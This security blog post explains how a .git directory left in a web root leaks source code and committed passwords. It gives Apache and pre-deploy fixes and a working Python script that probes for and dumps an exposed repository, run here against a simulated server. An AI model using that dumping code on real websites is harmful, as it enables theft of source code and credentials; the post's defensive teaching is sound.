Git clone — A devil in disguise
So you or your company make this fresh new website. The code has been reviewed for security vulnerabilities and you’re confident it’s the most secure thing you’ve built so far. The passwords in your configuration files are strong and your server has all of its security patches installed. So what do you do?
root@production# git clone git@git-server.com:company/website.git
root@production# service apache2 start
Yet within 10 minutes of it being live, someone plunders your database, steals your source code and defaces your brand new website. What happened?! Well, you might want to look at that first command again.
More specifically, the git clone part. What you might have missed is that you just created a hidden directory in your web-root containing all of your source code, your configuration files and every change you have ever made to the project. We’re talking, of course, about the .git directory.
So what? It’s just a directory with a bunch of random binary files, who cares? Well, git does. Git doesn’t keep track of your code by magic; it does it using that exact directory. Every version of every file you ever committed to that project is in there, including every hard-coded password and every vulnerability you have since fixed, because deleting a file in a later commit does not remove it from the history. With that directory sitting in your web-root, it’s there for the entire world to see.
All an attacker needs to do is download it and tell git to put the files back, and they have your complete source code with its full history, not to mention the name and internal email address of every developer who ever committed to that project.
Proof of concept
So what does an attack like this look like from the attacker’s perspective? They start out by simply probing your website for an exposed .git directory, typically by requesting /.git/HEAD and checking that the response is a real ref (ref: refs/heads/...) rather than your custom “page not found” page. In the example below I set up my own local web server that was intentionally vulnerable.
Once the attacker knows your website serves requests for the .git directory, they need to mirror the directory itself. With directory listings enabled a recursive download does the job; without them, the attacker reads .git/index, which names every tracked file and the hash of its contents, and then fetches the objects by hash. Publicly available tools automate both.
This is where things get scary: the attacker can now list every single file that you’ve ever added to git. Because the mirrored .git directory comes with an empty working tree, a simple git status reports every tracked file as deleted, which is more than enough to find out what files you have in store for them.
And now for the part that could ruin your business: exposing the source code and the passwords that are buried within it. Simply checking out the files they want to read is enough; git checkout restores them from the object store, and the history behind them comes along for free.
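The whole chain above, written out as an added example that is not part of the original post: it reproduces what the mirroring tools do when directory listings are off, without needing the git binary at all. The “web server” is a dict of constructed responses, and the .git/index and loose objects are built in memory by git_blob() and build_index() so the script runs offline; those helpers, the fetch() stand-in and the hunter2 password are this example’s own. It assumes loose objects only (real tools also unpack packfiles and walk commits and trees instead of trusting the index).

```python
import hashlib
import re
import struct
import zlib

# ---- constructed sample data (stand-in for a real web server) --------------
def git_blob(content):
    """Return (object id, loose object bytes) for a blob, stored exactly as git does."""
    raw = b"blob %d\0" % len(content) + content
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)

def build_index(entries):
    """Build a minimal version-2 .git/index listing the given (path, oid) pairs."""
    body = b"DIRC" + struct.pack(">II", 2, len(entries))
    for path, oid in entries:
        name = path.encode()
        # ctime/mtime (s, ns), dev, ino, mode, uid, gid, size: all zero except mode
        entry = struct.pack(">10I", 0, 0, 0, 0, 0, 0, 0o100644, 0, 0, 0)
        entry += bytes.fromhex(oid) + struct.pack(">H", min(len(name), 0xFFF)) + name
        entry += b"\0" * (8 - len(entry) % 8)  # NUL terminator plus padding to 8 bytes
        body += entry
    return body + hashlib.sha1(body).digest()  # trailing SHA-1 of everything before it

CONFIG = b"<?php\n$db_pass = 'hunter2';\n"  # constructed secret, not a real credential
CONFIG_OID, CONFIG_OBJ = git_blob(CONFIG)
INDEX_OID, INDEX_OBJ = git_blob(b"<?php echo 'hello';\n")
SOFT_404 = b"<html><body>Page not found</body></html>"
SERVER = {  # constructed responses, keyed by request path
    "/.git/HEAD": (200, b"ref: refs/heads/master\n"),
    "/.git/index": (200, build_index([("config.php", CONFIG_OID), ("index.php", INDEX_OID)])),
    f"/.git/objects/{CONFIG_OID[:2]}/{CONFIG_OID[2:]}": (200, CONFIG_OBJ),
    f"/.git/objects/{INDEX_OID[:2]}/{INDEX_OID[2:]}": (200, INDEX_OBJ),
}

def fetch(path):
    """Stand-in for HTTP GET; unknown paths get a 200 'soft 404', as many sites do."""
    return SERVER.get(path, (200, SOFT_404))

# ---- the attack ------------------------------------------------------------
def is_git_exposed(get):
    """Probe: a genuine HEAD is 'ref: refs/...' or a bare 40-hex commit id, not HTML."""
    status, body = get("/.git/HEAD")
    return status == 200 and re.fullmatch(rb"(ref: refs/\S+|[0-9a-f]{40})\n?", body) is not None

def parse_index(data):
    """List every tracked (path, oid) from .git/index; no directory listing needed."""
    if data[:4] != b"DIRC" or hashlib.sha1(data[:-20]).digest() != data[-20:]:
        raise ValueError("not a valid git index")
    version, count = struct.unpack(">II", data[4:12])
    if version not in (2, 3):  # version 4 compresses path names; not handled here
        raise ValueError("index version %d not handled here" % version)
    pos, files = 12, []
    for _ in range(count):
        oid = data[pos + 40:pos + 60].hex()
        namelen = struct.unpack(">H", data[pos + 60:pos + 62])[0] & 0xFFF
        if namelen == 0xFFF:  # name too long for the flags field: scan to the NUL
            namelen = data.index(b"\0", pos + 62) - (pos + 62)
        files.append((data[pos + 62:pos + 62 + namelen].decode(), oid))
        entry_len = 62 + namelen
        pos += entry_len + (8 - entry_len % 8)  # skip terminator and padding
    return files

def read_blob(get, oid):
    """Fetch a loose object by hash, inflate it and check it really is that object."""
    status, body = get(f"/.git/objects/{oid[:2]}/{oid[2:]}")
    if status != 200:
        return None
    raw = zlib.decompress(body)
    if hashlib.sha1(raw).hexdigest() != oid:
        raise ValueError("response is not git object " + oid)
    header, _, content = raw.partition(b"\0")
    if not header.startswith(b"blob "):
        raise ValueError("expected a blob, got " + header.decode())
    return content

def dump_repo(get):
    """Whole attack: probe, enumerate via the index, pull every blob. {path: bytes}"""
    if not is_git_exposed(get):
        return {}
    status, index = get("/.git/index")
    if status != 200:
        return {}
    return {path: read_blob(get, oid) for path, oid in parse_index(index)}

if __name__ == "__main__":
    for path, content in dump_repo(fetch).items():
        print(path, content.decode())
```

The probe deliberately checks the body and not just the status code: sites that answer every unknown path with a 200 “page not found” page would otherwise look exposed to a naive scanner, and the object-id check in read_blob catches the same soft-404 page being returned in place of an object. Note that nothing here needs a directory listing, which is why turning listings off is not a fix.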
Fixing the problem
Not all is lost; there’s a solution to every problem. There are a few ways to mitigate this. The first, and the best, is simply not to have your .git folder in your web-root in the first place: keep the clone somewhere the web server cannot reach and export only the files the site needs into the document root (git archive exists for exactly this), or at the very least delete the .git directory from the deployed copy. Remember that vendored libraries cloned into the web-root bring their own .git directories with them.
The second way is to tell the web server never to serve it. Apache reads extra configuration either from a .htaccess file in the directory itself or, better, from the virtual host configuration (000-default.conf on a default Debian or Ubuntu install). Both let you treat certain files and directories differently (they can do a lot more than that, but right now that’s not relevant). Two caveats: the <DirectoryMatch> block below is only valid in the server or virtual host configuration, not in .htaccess, where you would need a directive that is allowed there such as RedirectMatch; and .htaccess files are only read at all when AllowOverride permits them. Add the following to your virtual host to refuse any request that reaches the .git directory:
# Prevent access to publicly visible '.git' directories and everything under them
<DirectoryMatch "/\.git">
    # Apache 2.4
    Require all denied
    # Apache 2.2 (or 2.4 with mod_access_compat loaded) uses the older syntax instead:
    # Order deny,allow
    # Deny from all
    Options -Indexes
</DirectoryMatch>
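The first mitigation is easy to state and easy to get wrong in practice, so here is an added example (not from the original post) of a pre-deploy check that refuses a document root containing a .git directory anywhere beneath it. It also flags a .git file, which is what git leaves in the working tree when the repository was cloned with a separate git directory and which still advertises where the real repository lives. The sample tree, the function names and the vendored-library layout are this example’s own assumptions.

```python
import os
import tempfile

def find_git_leaks(docroot):
    """Return posix-style paths (relative to docroot) of every .git directory or file."""
    leaks = []
    for dirpath, dirnames, filenames in os.walk(docroot):
        if ".git" in dirnames:
            leaks.append(os.path.relpath(os.path.join(dirpath, ".git"), docroot))
            dirnames.remove(".git")  # no need to descend into the repository itself
        if ".git" in filenames:      # gitfile left by clone --separate-git-dir
            leaks.append(os.path.relpath(os.path.join(dirpath, ".git"), docroot))
    return sorted(p.replace(os.sep, "/") for p in leaks)

def safe_to_deploy(docroot):
    """Gate for a deploy script: True only if nothing under docroot leaks a repository."""
    return not find_git_leaks(docroot)

def build_sample_docroot():
    """Constructed tree: the site itself was exported cleanly, but a vendored
    library under vendor/lib was git cloned straight into the web-root."""
    root = tempfile.mkdtemp(prefix="docroot-")
    os.makedirs(os.path.join(root, "assets"))
    os.makedirs(os.path.join(root, "vendor", "lib", ".git", "objects"))
    with open(os.path.join(root, "index.php"), "w") as f:
        f.write("<?php echo 'hello';\n")
    with open(os.path.join(root, "vendor", "lib", ".git", "HEAD"), "w") as f:
        f.write("ref: refs/heads/master\n")
    return root

if __name__ == "__main__":
    root = build_sample_docroot()
    for leak in find_git_leaks(root):
        print("refusing to deploy: repository exposed at", leak)
    print("safe:", safe_to_deploy(root))
```

Run it against the real document root right before the web server is started or reloaded; a deploy that fails here is far cheaper than one that fails the way the post opens with.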
And that’s it! One more caveat: disabling directory listings alone (Options -Indexes) is not a fix, because an attacker does not need a listing; the name of every tracked file is in .git/index and the objects are fetched by hash. And if the directory was ever reachable, treat every password that was ever committed as compromised and rotate it, since removing the file in a later commit does not remove it from the history. Hopefully you’ll think twice before cloning your entire project straight into the web-root; following these steps will save you a lot of time and money in the long run.